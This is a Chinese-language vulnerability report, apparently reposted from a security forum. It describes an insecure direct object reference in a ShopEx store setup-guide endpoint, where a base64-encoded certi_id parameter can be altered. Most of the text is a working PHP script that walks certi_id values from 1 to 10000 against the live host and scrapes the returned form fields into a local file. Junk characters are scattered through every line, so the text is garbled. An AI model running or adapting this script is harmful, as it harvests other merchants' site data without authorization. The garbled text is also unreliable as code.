|
|
简要描述:6 i# |9 _+ H- X U" }( g5 l
ShopEx某接口缺陷,可遍历所有网站
+ Q3 W3 M2 Y4 L详细说明:0 [$ V( D% G# n; m, ]* C' V' `( v
问题出现在shopex 网店使用向导页面
8 m4 X* a4 u/ N+ j- D @
5 G( g" a) e1 F! l% `- w# e0 j* J) ~% A5 n( H
1 X/ h0 `( M R _2 F2 j$ y: F# N
http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=
2 ^) _9 p4 n6 X7 N6 p0 {% n$ M, B
4 N+ s _# T% ?( E! r4 d8 m6 w- a. Z! a N( x1 k) T
refer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}
7 s0 o4 d- ? Y! u
. ^' n! V; l6 m+ W) s: y& O% y3 b9 |7 K0 p q! o
" C' K% C5 A9 \& ]* o7 t我们修改certi_id 即可遍历所有使用了ShopEx程序的网站 4 p X' ]% V) ]2 N/ U' _) z
- W3 G3 t& M! y) Q4 K# E
8 q' }1 E# z" N9 T6 ?
0 v- i9 r8 _7 |<?php
9 x* Z/ M4 u1 x7 }/ m. g7 K, f% C& O5 L0 S
for ($i=1; $i < 10000; $i++) { //遍历
2 @0 O9 n; J8 o2 ~
- ^: d+ i: g" Q8 B) Y ShowshopExD($i);/ ^% ]0 U ^1 e l5 r$ q
" N; S; L0 }2 ?! L, A
}4 M' O. P# G1 s* D% |
& Z- ^* W# l7 g" P# X
function ShowshopExD($cid) {0 U) ]$ |4 |9 i6 J, ^
% [& s3 G( q7 d( ~( @0 u $url='http://guide.ecos.shopex.cn/step2.php';
4 a& \; C' j! B) d3 ?2 i3 K3 J# W) c# ~- V4 h
$refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');
2 W4 t+ P$ j1 m8 X8 f1 J+ ]& _' A1 W/ h# L
$url = $url.'?refer='.$refer;
7 c- Z, I; t* E& V3 ^' ^
2 [. L' T$ Y6 Y+ i: U# c $ch = curl_init($url);' Z. c( N/ ~2 |0 o' Z
$ T3 X9 Q3 @1 f4 |9 @8 g" B. D curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;
5 R, d: p" W" n5 J- \9 R
! W. ^9 Q* y% k' e) q curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;
2 c! X% \. T$ n/ [+ z
. e! A* q' w" L $result = curl_exec($ch);
H% @( v2 H4 X7 L! J z; i a, A7 x0 Y8 F
$result = mb_convert_encoding($result, "gb2312", "UTF-8");
' \) s1 T" I% ]/ ?5 @
) S! m! X" s4 o" w- U! T j if(strpos($result,$refer)); B% I1 J$ S9 ^) ~
" y8 q1 L0 q* W U# V# b
{
( v9 e: d0 }- k7 ~8 l; L% b& q# D1 X, p$ o' m5 ^9 g0 c; Y
$fp = fopen("c:/shopEx.txt",'ab'); //保存文件
8 [5 ^- Z/ l# k0 y4 r1 f2 {2 i3 u! e% u
preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);
* m$ f' p( ]% F' G/ ~% O- R; `
; c$ q9 h/ P4 n8 }+ o2 x' V g foreach ($value[1] as $key) {2 m$ r0 M9 d; S. q( `3 M+ R
5 P5 z, I6 i+ H# j2 k preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);
& V* r2 D+ y. i$ P
8 j4 V+ _! X& M! V3 S echo $res[1][0].':'.$res[3][0]."\r\n";
4 f8 [2 @6 U/ D
4 B( Y9 d/ A5 t. z: T$ `( y: a $col =$res[1][0].':'.$res[3][0]."\r\n"; - O# L: l# v) Y3 m3 U
* X9 M2 z, d1 t( p9 I' {6 z fwrite($fp, $col, strlen($col));
7 S2 V6 u2 q$ q7 R
\5 [! n' ~3 t: d# S# w }8 m, U& w+ x: V n( @! |
7 _9 H. ?" I/ C+ F, p. c6 C
echo '--------------------------------'."\r\n";1 k+ E! ?! N8 b; Y* `! t
8 q: e' x6 ]; F8 X
fclose($fp);
9 D0 s d: w8 M7 t
C& l- ]( r, v }
: B _& S! n8 F7 n+ g5 Z+ j( U5 {
8 \' _. s# _7 H4 E2 f flush();* m$ t- k# N4 t" g, C7 H- g
5 E5 w" H4 E/ O+ n& U. ^ curl_close($ch);- U8 A0 k2 A( _5 t; s. t' Y
5 l( p: o0 x& i2 @+ I$ d }
, Y3 n3 |8 n6 a y$ w3 [" I B$ y% q A
?>
+ ?4 j2 r# z. O- T漏洞证明:, [; a1 {" b0 g
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
) z. ^) P4 M; a3 N" e" U' brefer换成其他加密方式
3 d6 R7 }$ [+ p! G |
|